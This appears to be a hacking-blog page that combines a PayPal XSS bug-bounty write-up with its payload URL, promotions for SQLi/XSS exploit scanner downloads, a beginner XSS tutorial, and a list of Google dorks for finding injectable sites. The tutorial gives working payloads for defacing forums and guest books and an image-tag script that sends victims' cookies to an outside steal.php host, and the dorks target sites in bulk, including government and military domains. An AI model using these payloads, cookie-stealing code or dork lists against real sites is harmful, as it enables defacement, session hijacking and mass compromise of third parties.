XSS Bug on Paypal.com

Hello Leets,

Today i am writing about my finding on Paypal.com

That's a XSS ( Cross Site Scripting )......

The Story began at the 31st December 2014 when all people's are enjoying the new year celebration and i was engaged in finding security bugs...

Then i was try to hunting a paypal site...

After lots of try i found a pattern to inject my code to execute the XSS bug..


So the Vulnerable perameter is   
q = 

Vulnerable link:
===========


https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E

Poc:

=====

Video Demo:

==========

The bug is fixed Now and paypal pays me a bounty of  750$...

Thanks Paypal team....

Sql Poizon Free Download

SQL POIZEN



=> Sql poizon tool includes php, asp, rfi, lfi dorks. You can scan site by google dorks. And fix vulnerable sites. This software allows you to scan site based on country. After scan site you can crawl sites for checking vulnerability. You also can inject by this tools. Lets see screenshot of this tool:

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1

Updates
=======

• XSS Scanner
• RFi Scanner Bug fixed
• Remove Duplicate algorithm changed

Basics of XSS injection [Beginner Tutorial]

What is Cross Site Scripting:

XSS Stands for Cross Site Scripting, xss is a vulnerability that is normal found
in a web app. XSS allows the user to inject malicious codes such as HTML and
Java script. XSS can be used to steal cookies, make phishing pages and
just having some fun with the website.


What is A cookie:

A cookie is a text-only string that gets entered into the memory of your browser.
This value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then this string
is saved to file for future reference.


What can XSS do:

Cross Site Scripting is used commonly now days in the cyber
world. XSS can take down most websites that are up to date,
Cross Site Scripting can steal cookies from websites/forums.
Make pop ups, appear were there not suppose to "search bars"
etc. Or you can even do some very malicious codes such as
redirect the website to another one.


Hacking forums/guest books with XSS:

Forum Hacking: Now in order to defaced or even attempt
to hack a forum. The forum must have HTML enabled, so you can
enter some malicious codes. If the forum does have HTML enabled
then you can enter codes such as;

+++++++
Code:
+++++++

<html>
<head><title>XSS By Safe Hacking </title></head>
<body>
<img src="javascript:alert('Defaced By Unknown')">
</body>
</html>

If the forum allows the imagen tags then you can use this tag to
steal peoples cookies.

++++++
Code:
++++++

<img src="javascript:window.location=&amp;#39;http://www.url.com/steal.php?account=&amp;#39;+document.cookie&quot;>


Now to get to guest book hacking when your posting on the guest book
it must also be vulnerable. Meaning html must be enabled, to see if html
is enabled put these tags in your post <B>hello world</B> and if your
text comes back bold. Then html is enabled now try doing other techniques
you can also put some java script inside the html and see if that works.
And if it does or if it doesn't you can still deface the guest book with writing
up some cool html codes that take up the whole guest book page.


Defacing Websites with Cross Site Scripting:

Till now you AHian know Cross Site Scripting is used alot now days to exploit
websites and forums.Mostly search functions etc. Now some of the common XSS'es now days are within the search bars for websites. To make a box pop
up saying what every you put in the script. Some XSS codes are;

++++++
Code:
++++++

<script>alert("Safe Hacking")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert("Safe Hacking");</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>safehacking made you click on link</b>'>safehacking`</a>


Now how can I deface a website with just making 1 little pop up on
the search bar page? You can redirect the site to your website or your friends or you can steel cookies. Make a html defacement page and put the whole code
in your script. You can do many things, with java script on a vulnerable
website.

XSS Scanner 1.0

-----------------------------=[ XSS ScanneR 1.0 ]=-----------------------------
By Xylitol

I show you 20 dork exemples:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="



top level domains for xssing (make your own dork with this TLD):

+--------------------------------------------------------------------------------------------------------------------------------------+
| Generic top-level domains |
|--------------------------------------------------------------------------------------------------------------------------------------+
| Current |
|--------------------------------------------------------------------------------------------------------------------------------------+
| Generic | .biz | .com | .info | .name | .net | .org | .pro | |
+-----------------+--------+--------+--------+--------+--------+--------+--------+--------+-------+--------+---------+-------+---------+
| Sponsored | .aero | .asia | .cat | .coop | .edu | .gov | .int | .jobs | .mil | .mobi | .museum | .tel | .travel |
+-----------------+--------+-----------------------------------------------------------------------------------------------------------+
| Infrastructure |.arpa | |
+-----------------+--------+-----------------------------------------------------------------------------------------------------------+

domains can have: .gov.cn | .mil.kr | gov.uk | etc..

some extensions:
.html
.asp
.aspx
.jsp
.jspx
.php

etc...
Now you know that, you are the xss dorker's king...

DOWNLOAD